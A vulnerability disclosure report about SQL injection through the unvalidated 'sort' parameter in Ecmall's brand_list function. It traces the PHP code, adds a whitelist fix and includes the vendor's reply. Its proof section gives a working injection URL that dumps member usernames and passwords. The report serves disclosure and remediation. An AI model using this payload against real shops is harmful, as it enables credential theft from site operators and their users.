Vulnerability Summary
Title: SQL injection vulnerability in Ecmall
Submitted: 2014-02-27 10:51
Fixed: 2014-05-28 10:51
Published: 2014-05-28 10:51
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: Confirmed by vendor
Tags:
None
Vulnerability Details
Disclosure status:
2014-02-27: Details reported to the vendor, awaiting vendor handling
2014-02-27: Vendor confirmed; details disclosed to the vendor only
2014-03-02: Details opened to third-party security partners
2014-04-23: Details opened to core white hats and experts in the relevant field
2014-05-03: Details opened to regular white hats
2014-05-13: Details opened to intern white hats
2014-05-28: Details opened to the public
Brief description: If you don't fix them, I'll report them one by one.
Detailed description: Defective file: /app/my_goods.app.php
function brand_list()
{
    if (!empty($_GET['brand_name']) || !empty($_GET['store'])) {
        $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";
        $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;
    }
    if (isset($_GET['sort']) && isset($_GET['order'])) {
        $sort = strtolower(trim($_GET['sort'])); // not filtered
        $order = strtolower(trim($_GET['order']));
        if (!in_array($order, array('asc', 'desc'))) {
            $sort = 'store_id';
            $order = 'desc';
        }
    } else {
        $sort = 'store_id';
        $order = 'desc';
    }
    $page = $this->_get_page(10);
    $conditions = $this->_get_query_conditions($con);
    $brand = $this->_brand_mod->find(array( // trace this call
        'conditions' => "(1=1 $conditions)" . $filtered,
        'limit' => $page['limit'],
        'order' => "$sort $order", // here
        'count' => true,
    ));
    ……

function find($params = array())
{
    extract($this->_initFindParams($params));
    /* Fields (SELECT FROM) */
    $fields = $this->getRealFields($fields);
    $fields == '' && $fields = '*';
    $tables = $this->table . ' ' . $this->alias;
    /* Left join (LEFT JOIN) */
    $join_result = $this->_joinModel($tables, $join);
    /* This used to be ($join_result || $index_key); the original intent has been forgotten. Appending the primary key by default should only serve building the indexed array, so it depends solely on whether the index key is the primary key */
    if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key))) {
        /* If the index key contains the primary key, append the primary key to the queried fields by default */
        $fields .= ",{$this->alias}.{$this->prikey}";
    }
    /* Conditions (WHERE) */
    $conditions = $this->_getConditions($conditions, true);
    /* Sorting (ORDER BY) */
    $order && $order = ' ORDER BY ' . $this->getRealFields($order); // trace this call
    ……

function getRealFields($src_fields_list)
{
    $fields = $src_fields_list;
    if (!$src_fields_list) {
        $fields = '';
    }
    $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields); // has no effect on the injected string
    return $fields;
}

function _getFieldTable($owner)
{
    if ($owner == 'this') {
        return $this->alias;
    } else {
        $m =& m($owner);
        if ($m === false) {
            /* If no such object exists, return the owner unchanged */
            return $owner;
        }
        return $m->alias;
    }
}
The sort parameter is never validated, so its value reaches the ORDER BY clause unchanged: injection is present.
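As an added example (not code from this report or from Ecmall), the following shows how brand_list() could validate both ORDER BY inputs against whitelists before they reach the query; the list of sortable columns is an assumption for illustration, and the inputs below are constructed.

```php
<?php
// Added example, not from the report or the Ecmall code base.
// Whitelist validation of the sort/order parameters used in ORDER BY.
// The sortable column names are an assumed list for illustration.

function sanitize_brand_sort(array $get): array
{
    // Only columns that actually exist on the brand table may be sorted on.
    $allowed_sort  = ['store_id', 'brand_name', 'brand_id'];
    $allowed_order = ['asc', 'desc'];

    $sort  = isset($get['sort'])  ? strtolower(trim($get['sort']))  : '';
    $order = isset($get['order']) ? strtolower(trim($get['order'])) : '';

    // The original code only checked $order and passed $sort through verbatim.
    // Here each value independently falls back to its default unless it is
    // an exact (strict) match against its whitelist.
    if (!in_array($sort, $allowed_sort, true)) {
        $sort = 'store_id';
    }
    if (!in_array($order, $allowed_order, true)) {
        $order = 'desc';
    }
    return ['sort' => $sort, 'order' => $order];
}

// Constructed inputs: an arbitrary SQL fragment in sort is replaced by the
// default column, a legitimate request passes through, an unknown order
// keyword falls back to the default direction.
$cases = [
    ['sort' => '1 and (select 1)', 'order' => 'asc'],
    ['sort' => 'brand_name',       'order' => 'ASC'],
    ['sort' => 'brand_id',         'order' => 'drop'],
];
foreach ($cases as $case) {
    $clean = sanitize_brand_sort($case);
    printf("sort=%s order=%s -> ORDER BY %s %s\n",
        $case['sort'], $case['order'], $clean['sort'], $clean['order']);
}
```

Because the whitelist compares whole strings with strict in_array(), no escaping of the value is needed: anything not literally a known column or direction is discarded rather than passed to the database.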
Proof of vulnerability:
Exploitation method: Register a member account and open a shop, then visit: index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23 This dumps the username and password.
Fix suggestion:
Vulnerability Response
Vendor response: Severity: Low
Vulnerability Rank: 3
Confirmed: 2014-02-27 12:30
Vendor reply: Thank you very much for your contribution to ShopEx information security. This vulnerability has already been submitted through other channels and is being handled. Thanks.
Latest status: None